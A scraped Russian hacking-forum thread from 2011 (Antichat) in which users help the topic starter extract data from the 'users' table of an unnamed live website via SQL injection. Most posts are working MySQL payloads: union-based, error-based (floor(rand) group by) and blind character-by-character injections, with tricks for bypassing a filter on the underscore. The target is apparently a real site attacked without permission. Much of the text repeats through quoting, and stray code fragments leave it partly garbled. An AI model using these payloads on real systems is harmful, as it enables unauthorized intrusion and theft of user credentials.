 |
|
24.12.2011, 17:41
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от listika
все верно, так и возвращает...
Прочитай тут, последнее предложение, мб получится, хотя шансов мало.
|
|
|
24.12.2011, 17:51
|
|
Новичок
Регистрация: 26.08.2011
Сообщений: 10
Провел на форуме:
3288
Репутация:
0
|
|
Сообщение от Ereee
Будет резать. ТС, пробуй:
id=-480+union+select+unhex(0x757365725f6964),2+from+us ers+LIMIT+1,1 --
запрос SELECT unhex( 0x757365725f6964 )
возвращает
unhex(0x757365725f6964)
NULL
|
|
|
|
24.12.2011, 17:52
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Стaло быть никак =\ Ссылку в студио, пожалуйста!
|
|
|
|
24.12.2011, 17:54
|
|
Новичок
Регистрация: 26.08.2011
Сообщений: 10
Провел на форуме:
3288
Репутация:
0
|
|
Сообщение от Expl0ited
Я думаю в данном случае извратится с mysql не выйдет, и нужно искать способ обхода проверки символа _ в скрипте, например его урл-кодированным эквивалентом (%5f), или же другим способом.
%5f вырезалось как и просто с подчеркиванием
|
|
|
|
24.12.2011, 17:57
|
|
Новичок
Регистрация: 26.08.2011
Сообщений: 10
Провел на форуме:
3288
Репутация:
0
|
|
Сообщение от Ereee
Ссылку в студио, пожалуйста!
Не могу...
|
|
|
|
24.12.2011, 18:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
UPD2
Для поля таблицы можно попробовать такой обход.
Нужно подбирать количество полей в таблице users и местоположение интересующего поля.
Допустим таблица имеет три поля
user_id, user_name, user_password, тогда для вывода второго и третьего поля:
Код:
id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+
|
|
|
|
24.12.2011, 18:34
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Вариант 1
Это можно попробывать сделать как-то так:
1 union select * from (select 1,2,3,4,5)b,users,(select 1,2,3,4)a
1 union select 6,users.*,2,3,4,5,1 from users
(полный запрос приводить не буду )
Но тут нужно несколько условий. Подробнее:
/threadnav43966-6-10.html
53-54 посты
Ну и конечно с information_schema попрощаться
Вариант 2
Искать двойной запрос и уже в нём нормально крутить в 0x
Вариант 3
Не ломать фрагорию (почему-то мне кажется что это именно она )) - это плохо кончится.
nikp
concat_ws не пропустит из-за "_"
|
|
|
|
24.12.2011, 18:46
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Ответ дан , тема закрыта. Если у ТС, что то не получится пусть отпишет мне в пм.
Сообщение от Expl0ited
Сообщение от listika
Сообщение от None
Если у ТС, что то не получится пусть отпишет мне в пм.
Не успела отправить сообщение...
Сообщение от nikp
UPD2
Для поля таблицы можно попробовать такой обход.
Нужно подбирать количество полей в таблице users и местоположение интересующего поля.
Допустим таблица имеет три поля
user_id, user_name, user_password, тогда для вывода второго и третьего поля:
Код:
id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+
Она еще и слепая. Использую такую конструкцию:
Код:
id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+
В таком случае ваш способ можно применить попробовать?
" if author else f"
listika said:
Сообщение от None
Если у ТС, что то не получится пусть отпишет мне в пм.
Не успела отправить сообщение...
Сообщение от nikp
UPD2
Для поля таблицы можно попробовать такой обход.
Нужно подбирать количество полей в таблице users и местоположение интересующего поля.
Допустим таблица имеет три поля
user_id, user_name, user_password, тогда для вывода второго и третьего поля:
Код:
id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+
Она еще и слепая. Использую такую конструкцию:
Код:
id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+
В таком случае ваш способ можно применить попробовать? У тебя вывод в ошибке, или же всетаки она совсем слепая?
если она совсем слепая тогда вот валидная конструкция
Код:
id=480 and 1=if(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,1)='a',1,2)--+
Работать будет при условии, если в таблице users 4 колонки, и первый символ во второй колонке и второй записи таблицы равен 'a' вернет валидную страницу под id=480, если же нет то вернет пустую страницу, т.к. не выполнится условие. И перебирать в таком духе.
Если же у тебя вывод в ошибке, тогда:
Код:
id=480 and (select(max(1))from(mysql.user)group+by(concat(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,60),0x00,floor(rand(0)*2))))--+
" if author else f"
Expl0ited said:
Сообщение от listika
Сообщение от None
Если у ТС, что то не получится пусть отпишет мне в пм.
Не успела отправить сообщение...
Сообщение от nikp
UPD2
Для поля таблицы можно попробовать такой обход.
Нужно подбирать количество полей в таблице users и местоположение интересующего поля.
Допустим таблица имеет три поля
user_id, user_name, user_password, тогда для вывода второго и третьего поля:
Код:
id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+
Она еще и слепая. Использую такую конструкцию:
Код:
id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+
В таком случае ваш способ можно применить попробовать?
" if author else f"
listika said:
Сообщение от None
Если у ТС, что то не получится пусть отпишет мне в пм.
Не успела отправить сообщение...
Сообщение от nikp
UPD2
Для поля таблицы можно попробовать такой обход.
Нужно подбирать количество полей в таблице users и местоположение интересующего поля.
Допустим таблица имеет три поля
user_id, user_name, user_password, тогда для вывода второго и третьего поля:
Код:
id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+
Она еще и слепая. Использую такую конструкцию:
Код:
id=-480+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select user from users limit 0,1), 1, 63), FLOOR(RAND(0)*2)))+--+
В таком случае ваш способ можно применить попробовать? У тебя вывод в ошибке, или же всетаки она совсем слепая?
если она совсем слепая тогда вот валидная конструкция
Код:
id=480 and 1=if(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,1)='a',1,2)--+
Работать будет при условии, если в таблице users 4 колонки, и первый символ во второй колонке и второй записи таблицы равен 'a' вернет валидную страницу под id=480, если же нет то вернет пустую страницу, т.к. не выполнится условие. И перебирать в таком духе.
Если же у тебя вывод в ошибке, тогда:
Код:
id=480 and (select(max(1))from(mysql.user)group+by(concat(mid((select concat(s2,0x3a,s3) from(select(s2),(s3)from(select(1),2 s2,3 s3,4 union(select * from users))k)n limit 1,1),1,60),0x00,floor(rand(0)*2))))--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
